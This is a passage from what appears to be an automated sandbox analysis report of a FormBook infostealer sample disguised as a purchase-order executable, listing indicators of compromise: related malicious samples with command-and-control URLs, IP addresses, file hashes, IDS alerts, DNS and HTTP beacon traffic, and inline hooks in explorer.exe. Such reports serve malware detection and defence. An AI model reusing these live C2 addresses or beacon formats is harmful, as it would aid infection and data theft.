                                            • www.e-readertnpasumo5.xyz/mwev/?n8o8k4=s6JjqHrQhtmRWbO5qNja442Ngbg13E4gPlYXf4CDaMRBDRGw8TbY6EH4VHnxd8/K7vvQVg==&ap=-Zj4
                                            F30AGnBthja6Ka2.exeGet hashmaliciousBrowse
                                            • www.lm-safe-keepingtoyof4.xyz/n35q/?g6YDq=Wv0dqvs8lJwXid_P&5joLT4Q=IZFN/VIywbhLRJtRnBeGYuVozig+PLM9162SZrHwuJmr7rD0xTfdi4jzZlcOLsRTbY5a
                                            Diagram and Specifications.exeGet hashmaliciousBrowse
                                            • www.lly03toyof4.xyz/sw39/?3fI0hDv=H19d1GjxiY7aDYQouKVpvu5ugVR3f0gotfGKpnd7ufTQ/ckXv8DnpDWqGu8YbIlnhBEC&hL=4hu4Zrlx
                                            soa_02010021.exeGet hashmaliciousBrowse
                                            • www.eco1tnpasumo3.xyz/nqn4/?rN64X=Mv6pP6pP&-ZddGje=vanPYQUuZ3XFRC7SYcRcV+oaGEE9ir47lHLJmRrDHNXTaYXBSumhPRu6vgIi5Ucq3YEQ
                                            AWB-kp035Maersk.exeGet hashmaliciousBrowse
                                            • www.lightswaranwgt76.xyz/cl8k/?I8PHbJ2P=7o17KyM4PBNcdnCS5DRkZ/XJrfTNVAQ49VkyourTKnWaeF8lIwoMfqHFOrhZgIdgF0AK&7nnp_=AV0l
                                            MV ROCKET_PDA.exeGet hashmaliciousBrowse
                                            • www.eco1tnpasumo3.xyz/nqn4/?T2MpwT=vanPYQUuZ3XFRC7SYcRcV+oaGEE9ir47lHLJmRrDHNXTaYXBSumhPRu6vjoy21MSp9tX&VDK0L=5jZhjDchE
                                            n14Gz5Qjcb.exeGet hashmaliciousBrowse
                                            • www.rawhoneytnpasumo6.xyz/m0np/?9rjPn6YP=jlbGx/ze8CP5AGcSSAWWd1mzA5QWN95ANb9dADdfV40QuflaaY29PF8tVyxQyxmkQaSI&j6782P=EZM4Hn6
                                            SYsObQNkC1.exeGet hashmaliciousBrowse
                                            • www.rawhoneytnpasumo6.xyz/m0np/?U2Jprb-=jlbGx/ze8CP5AGcSSAWWd1mzA5QWN95ANb9dADdfV40QuflaaY29PF8tVxRA9Q2cO/7P&cT=7nBDtz4x
                                            SALES CONTRACT 914 VIPA ORDER 213581.xlsxGet hashmaliciousBrowse
                                            • www.yozotnpasumo4.xyz/9gdg/?n8JX4=rhbOZ5tChQo7vrxyCoT/NvoAZwtLS/ySMYcbtm1mQnSdzkI9qiVaOt/asz9IxM02ycbsgg==&e6AX=9rIPB
                                            EIElnDxX0V.exeGet hashmaliciousBrowse
                                            • www.rawhoneytnpasumo6.xyz/m0np/?5joLnT=jlbGx/ze8CP5AGcSSAWWd1mzA5QWN95ANb9dADdfV40QuflaaY29PF8tVy9QhhqnJKSer7wyaw==&x48L=9rPL8fGx8
                                            DOC.exeGet hashmaliciousBrowse
                                            • www.businesszukai.com/imm8/?oZBd28E8=FtzG4nVao7RGnpiPAUTOHzX+ComCJgTxVAA7jEIQ99qrgC2i4yGXxLE7fpRdiVaJ0w+u&7n6hj=p2MtFfu8w4Y
                                            PAYMENT ADVISE CONFIRMATION.xlsxGet hashmaliciousBrowse
                                            • www.rjb355.xyz/att3/?d8EdM=5jeDV20pBRJHXPo0&AHRDZVs=bhDRCC3Yl61/258JNgDxkJaKmIOd6kTln+2NX7EMzgyYOep5PphbUdqUvSZC+n+eFvYVMg==
                                            PROFOMA INVOICE NO2021TD24 PDF.exeGet hashmaliciousBrowse
                                            • www.hold-sometimes.xyz/ssee/?MBZp=A0DTKVI&k0GDpTe=SLXqLbVogVOmzD5x7TF5YDBiNFFEDQhqQaeiGgch4Tvb9L/HBk+4drk9DekX4BUJHdpE
                                            #7091.pdf.exeGet hashmaliciousBrowse
                                            • www.gwh525.xyz/gm9w/?kZR=SBgXj&5j=pl70zmZe6iC967JcRkVJi5bANyE1hTx+7JFuE+QWvqw/ndgwpf2/G4CCDYTbrIzzAG/c
                                            RFQ, Scope of Requirements PDF.exeGet hashmaliciousBrowse
                                            • www.hold-sometimes.xyz/ssee/?c6A8szA=SLXqLbVogVOmzD5x7TF5YDBiNFFEDQhqQaeiGgch4Tvb9L/HBk+4drk9Dek9nxkJDfhE&ZRqLPd=7nE0dtjpKd7
                                            Order_2084.exeGet hashmaliciousBrowse
                                            • www.sometingwild.com/rqe8/?oZhtNxR=QYiwiO9SCZDy/G7W+Bo397AAf+TAkPtFsK9VX0BihvC7Ep5smT5MjlmXlwucRZfhSaQc&7n=h40X
                                            Pending DHL Shipment Notification REF 81621.exeGet hashmaliciousBrowse
                                            • www.hold-sometimes.xyz/ssee/?-ZeDzN_=SLXqLbVogVOmzD5x7TF5YDBiNFFEDQhqQaeiGgch4Tvb9L/HBk+4drk9DekX4BUJHdpE&xJBTI=PHsdF4OxqDN8N8ZP
                                            hu3fkyvz5Y.exeGet hashmaliciousBrowse
                                            • www.o72lab.com/i7dg/?A6AT=KLqFW7q7vJQ5dEUL0c1bE2IQuFF8GNWa2S5pk1tOJ4HLfTR1kNQ1OKxzY4oES7RxnevF&knZ=1by0_ZBPIXv80F
                                            Remittance.exeGet hashmaliciousBrowse
                                            • www.oneonecity.xyz/udew/?5jS0E=y0DP&fZ=N+HvIhXSEX4Ftk11NAt0NiYU1gvcyzQfzCwODxtCZBlrbwkU/Fmy7dLNUhQJfDmEovY5
                                            PI_NGOIU00987.exeGet hashmaliciousBrowse
                                            • www.alexgoestech.xyz/uecu/?KJE0k=v3ox63M4CDEHY+dz4sl2sSOFGFYDWtyb6TlC+A0rVG3GBM4V/JHpU4VTMu4TbGy/jm8X&7n=MDKTHlx8Z

                                            Domains

                                            No context

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            INTERQGMOInternetIncJPCtTYTpaAKA.exeGet hashmaliciousBrowse
                                            • 157.7.107.193
                                            SHIPPING DOCUMENT.xlsxGet hashmaliciousBrowse
                                            • 150.95.255.38
                                            F9ObnUc4ol.exeGet hashmaliciousBrowse
                                            • 118.27.122.187
                                            DHL_119040 receipt document,pdf.exeGet hashmaliciousBrowse
                                            • 150.95.219.218
                                            n7gjtO4ZwD.exeGet hashmaliciousBrowse
                                            • 118.27.122.92
                                            F30AGnBthja6Ka2.exeGet hashmaliciousBrowse
                                            • 150.95.255.38
                                            PFD33mzc5lGet hashmaliciousBrowse
                                            • 118.27.80.204
                                            comingback.exeGet hashmaliciousBrowse
                                            • 118.27.122.217
                                            MV ANACAPA LIGHT.xlsxGet hashmaliciousBrowse
                                            • 118.27.122.214
                                            cyberantix-PayroLL-997263-pdf.HtMLGet hashmaliciousBrowse
                                            • 150.95.219.148
                                            cyberantix-PayroLL-997263-pdf.HtMLGet hashmaliciousBrowse
                                            • 150.95.219.148
                                            8jfOcvTqQAGet hashmaliciousBrowse
                                            • 163.44.189.209
                                            IN7REq0Jv5Get hashmaliciousBrowse
                                            • 133.130.112.119
                                            GDs-#09283 DIAGRAM AND PRODUCT SPECIFICATIONS.pdl.exeGet hashmaliciousBrowse
                                            • 150.95.59.10
                                            s0bi9tGet hashmaliciousBrowse
                                            • 210.157.44.132
                                            Diagram and Specifications.exeGet hashmaliciousBrowse
                                            • 150.95.255.38
                                            soa_02010021.exeGet hashmaliciousBrowse
                                            • 150.95.255.38
                                            sLtLgOtoPA.exeGet hashmaliciousBrowse
                                            • 157.7.107.193
                                            94VG.armGet hashmaliciousBrowse
                                            • 157.7.100.11
                                            PO08485.xlsxGet hashmaliciousBrowse
                                            • 118.27.122.218
                                            AMAZON-AESUSUW_230 West 41st St_20211027.xlsmGet hashmaliciousBrowse
                                            • 52.204.158.151
                                            e6dff8475541ebddc1f0db47a311eb2c25581b7d5e62a.exeGet hashmaliciousBrowse
                                            • 3.209.18.1
                                            arm7Get hashmaliciousBrowse
                                            • 23.21.163.253
                                            x86_64Get hashmaliciousBrowse
                                            • 52.86.141.255
                                            Purchase order.docGet hashmaliciousBrowse
                                            • 54.156.84.168
                                            triage_dropped_file.dllGet hashmaliciousBrowse
                                            • 3.232.242.170
                                            Payment Advice.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            AWB#708900271021,PDF.exeGet hashmaliciousBrowse
                                            • 34.237.7.9
                                            2jFfKOEefN.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            vx55dc0wIv.exeGet hashmaliciousBrowse
                                            • 34.233.132.165
                                            SKGCM_YAHYA AZHEBS#U0130 Ponuda proizvoda7.exeGet hashmaliciousBrowse
                                            • 52.20.84.62
                                            usuyeoiSVT.exeGet hashmaliciousBrowse
                                            • 44.199.40.234
                                            PLSW217DEJ59.vbsGet hashmaliciousBrowse
                                            • 34.199.8.144
                                            Order.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            RIVERSEDGE #PO, INVOICE Acknowledge & E- Check Remittance Advice - Copy.htmlGet hashmaliciousBrowse
                                            • 35.168.68.183
                                            payment advice_16000.exeGet hashmaliciousBrowse
                                            • 52.21.5.29
                                            hSNPFOpBGX.exeGet hashmaliciousBrowse
                                            • 3.220.57.224
                                            Wq9FLAFuS8.exeGet hashmaliciousBrowse
                                            • 54.91.6.89
                                            Unpaid invoice.exeGet hashmaliciousBrowse
                                            • 3.223.115.185
                                            IMS211323.xlsxGet hashmaliciousBrowse
                                            • 54.192.66.129

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO_101&102.exe.log
                                            Process:C:\Users\user\Desktop\PO_101&102.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1314
                                            Entropy (8bit):5.350128552078965
                                            Encrypted:false
                                            SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                            MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                            SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                            SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                            SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.424831742558016
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Windows Screen Saver (13104/52) 0.07%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            File name:PO_101&102.exe
                                            File size:680960
                                            MD5:d814902ba2d06c94c66f52ce53ed1428
                                            SHA1:152f01b88a43ae7f0cf486a947bb0b0b23496827
                                            SHA256:cce115dcfb19503dfbc71566681425094ca56887fc1afe85b9bc9788341312bf
                                            SHA512:ea59a8d6d27b1434ae2245c8d708a1a94f066721de015c3a8d40af55fdcbf98e71a8af9e3006bda6874444ca9fee79f5338ace935392b5cba5d02b2a2ce956dd
                                            SSDEEP:12288:JVMVrsFuujDwb/UH4Z5dH4ien5nh623Rl6rxIeSRobTmWDhLsqJFTP:JKVrsFuuj+UH4Z5qignFD2lwWdQq
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~.ya..............P..Z...........y... ........@.. ....................................@................................

                                            File Icon

                                            Icon Hash:00828e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x4a79ee
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x6179BF7E [Wed Oct 27 21:07:10 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa799c0x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xa80000x5a4.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xaa0000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000xa59f40xa5a00False0.697439563679data7.43356279731IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rsrc0xa80000x5a40x600False0.41796875data4.0566993219IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0xaa0000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_VERSION0xa80900x314data
                                            RT_MANIFEST0xa83b40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Version Infos

                                            DescriptionData
                                            Translation0x0000 0x04b0
                                            LegalCopyrightCopyright 2019
                                            Assembly Version1.0.0.0
                                            InternalNamerfNVoNr.exe
                                            FileVersion1.0.0.0
                                            CompanyName
                                            LegalTrademarks
                                            Comments
                                            ProductNameplacement
                                            ProductVersion1.0.0.0
                                            FileDescriptionplacement
                                            OriginalFilenamerfNVoNr.exe

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            10/28/21-00:23:09.142294TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975480192.168.2.352.44.94.227
                                            10/28/21-00:23:09.142294TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975480192.168.2.352.44.94.227
                                            10/28/21-00:23:09.142294TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975480192.168.2.352.44.94.227

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 28, 2021 00:23:08.164359093 CEST4975480192.168.2.352.44.94.227
                                            Oct 28, 2021 00:23:08.303301096 CEST804975452.44.94.227192.168.2.3
                                            Oct 28, 2021 00:23:08.303469896 CEST4975480192.168.2.352.44.94.227
                                            Oct 28, 2021 00:23:09.142293930 CEST4975480192.168.2.352.44.94.227
                                            Oct 28, 2021 00:23:09.281097889 CEST804975452.44.94.227192.168.2.3
                                            Oct 28, 2021 00:23:09.281163931 CEST804975452.44.94.227192.168.2.3
                                            Oct 28, 2021 00:23:09.281204939 CEST804975452.44.94.227192.168.2.3
                                            Oct 28, 2021 00:23:09.281322956 CEST4975480192.168.2.352.44.94.227
                                            Oct 28, 2021 00:23:09.293636084 CEST4975480192.168.2.352.44.94.227
                                            Oct 28, 2021 00:23:09.432229042 CEST804975452.44.94.227192.168.2.3
                                            Oct 28, 2021 00:23:45.965338945 CEST4978180192.168.2.3150.95.255.38
                                            Oct 28, 2021 00:23:46.241179943 CEST8049781150.95.255.38192.168.2.3
                                            Oct 28, 2021 00:23:46.242845058 CEST4978180192.168.2.3150.95.255.38
                                            Oct 28, 2021 00:23:46.242897034 CEST4978180192.168.2.3150.95.255.38
                                            Oct 28, 2021 00:23:46.519001961 CEST8049781150.95.255.38192.168.2.3
                                            Oct 28, 2021 00:23:46.519165993 CEST8049781150.95.255.38192.168.2.3
                                            Oct 28, 2021 00:23:46.519208908 CEST8049781150.95.255.38192.168.2.3
                                            Oct 28, 2021 00:23:46.519517899 CEST4978180192.168.2.3150.95.255.38
                                            Oct 28, 2021 00:23:46.519632101 CEST4978180192.168.2.3150.95.255.38
                                            Oct 28, 2021 00:23:46.796530962 CEST8049781150.95.255.38192.168.2.3

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 28, 2021 00:23:08.112143993 CEST5510253192.168.2.38.8.8.8
                                            Oct 28, 2021 00:23:08.136106014 CEST53551028.8.8.8192.168.2.3
                                            Oct 28, 2021 00:23:25.489010096 CEST5623653192.168.2.38.8.8.8
                                            Oct 28, 2021 00:23:25.526612043 CEST53562368.8.8.8192.168.2.3
                                            Oct 28, 2021 00:23:45.706701994 CEST4955953192.168.2.38.8.8.8
                                            Oct 28, 2021 00:23:45.963149071 CEST53495598.8.8.8192.168.2.3
                                            Oct 28, 2021 00:24:07.353573084 CEST5265053192.168.2.38.8.8.8
                                            Oct 28, 2021 00:24:07.479249001 CEST53526508.8.8.8192.168.2.3

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Oct 28, 2021 00:23:08.112143993 CEST192.168.2.38.8.8.80x9e4cStandard query (0)www.barbershopvalleyvillage.comA (IP address)IN (0x0001)
                                            Oct 28, 2021 00:23:25.489010096 CEST192.168.2.38.8.8.80x9a2Standard query (0)www.reprv.comA (IP address)IN (0x0001)
                                            Oct 28, 2021 00:23:45.706701994 CEST192.168.2.38.8.8.80xf2a4Standard query (0)www.champ-beauty-tomigaoka-nail.comA (IP address)IN (0x0001)
                                            Oct 28, 2021 00:24:07.353573084 CEST192.168.2.38.8.8.80x5feaStandard query (0)www.99rocket.educationA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Oct 28, 2021 00:23:08.136106014 CEST8.8.8.8192.168.2.30x9e4cNo error (0)www.barbershopvalleyvillage.combarbershopvalleyvillage.comCNAME (Canonical name)IN (0x0001)
                                            Oct 28, 2021 00:23:08.136106014 CEST8.8.8.8192.168.2.30x9e4cNo error (0)barbershopvalleyvillage.com52.44.94.227A (IP address)IN (0x0001)
                                            Oct 28, 2021 00:23:25.526612043 CEST8.8.8.8192.168.2.30x9a2Name error (3)www.reprv.comnonenoneA (IP address)IN (0x0001)
                                            Oct 28, 2021 00:23:45.963149071 CEST8.8.8.8192.168.2.30xf2a4No error (0)www.champ-beauty-tomigaoka-nail.com150.95.255.38A (IP address)IN (0x0001)
                                            Oct 28, 2021 00:24:07.479249001 CEST8.8.8.8192.168.2.30x5feaNo error (0)www.99rocket.education208.91.197.39A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • www.barbershopvalleyvillage.com
                                            • www.champ-beauty-tomigaoka-nail.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.34975452.44.94.22780C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Oct 28, 2021 00:23:09.142293930 CEST5180OUTGET /snr6/?v0DD=Zy5Qpi9o71BxgS1SycsJXGxeSETLIPANxi7ogI8FlHlRlRfybFGNqMyxmIVsIwo4eCM0&p2MTV=Jf94jZD8vHv8m HTTP/1.1
                                            Host: www.barbershopvalleyvillage.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 28, 2021 00:23:09.281163931 CEST5180INHTTP/1.1 301 Moved Permanently
                                            Server: openresty
                                            Date: Wed, 27 Oct 2021 22:23:09 GMT
                                            Content-Type: text/html
                                            Content-Length: 182
                                            Connection: close
                                            Location: https://www.barbershopvalleyvillage.com/snr6/?v0DD=Zy5Qpi9o71BxgS1SycsJXGxeSETLIPANxi7ogI8FlHlRlRfybFGNqMyxmIVsIwo4eCM0&p2MTV=Jf94jZD8vHv8m
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.349781150.95.255.3880C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Oct 28, 2021 00:23:46.242897034 CEST5990OUTGET /snr6/?v0DD=AT56xQorg2W9iGq4d7Tt4iWj+Y9aO9Wbdx0aYCn8sjL6tNqdMMFemPCECz3N3nQc4IZ0&p2MTV=Jf94jZD8vHv8m HTTP/1.1
                                            Host: www.champ-beauty-tomigaoka-nail.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 28, 2021 00:23:46.519165993 CEST5991INHTTP/1.1 302 Found
                                            Date: Wed, 27 Oct 2021 22:23:46 GMT
                                            Server: Apache
                                            Location: http://dfltweb1.onamae.com
                                            Content-Length: 210
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 66 6c 74 77 65 62 31 2e 6f 6e 61 6d 61 65 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://dfltweb1.onamae.com">here</a>.</p></body></html>


                                            Code Manipulations

                                            User Modules

                                            Hook Summary

                                            Function NameHook TypeActive in Processes
                                            PeekMessageAINLINEexplorer.exe
                                            PeekMessageWINLINEexplorer.exe
                                            GetMessageWINLINEexplorer.exe
                                            GetMessageAINLINEexplorer.exe

                                            Processes

                                            Process: explorer.exe, Module: user32.dll
                                            Function NameHook TypeNew Data
                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xEA
                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xEA
                                            GetMessageWINLINE0x48 0x8B 0xB8 0x89 0x9E 0xEA
                                            GetMessageAINLINE0x48 0x8B 0xB8 0x81 0x1E 0xEA

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Start time:00:21:56
                                            Start date:28/10/2021
                                            Path:C:\Users\user\Desktop\PO_101&102.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Users\user\Desktop\PO_101&102.exe'
                                            Imagebase:0x530000
                                            File size:680960 bytes
                                            MD5 hash:D814902BA2D06C94C66F52CE53ED1428
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.294755714.00000000039A0000.00000004.00000001.sdmp, Author: Joe Security
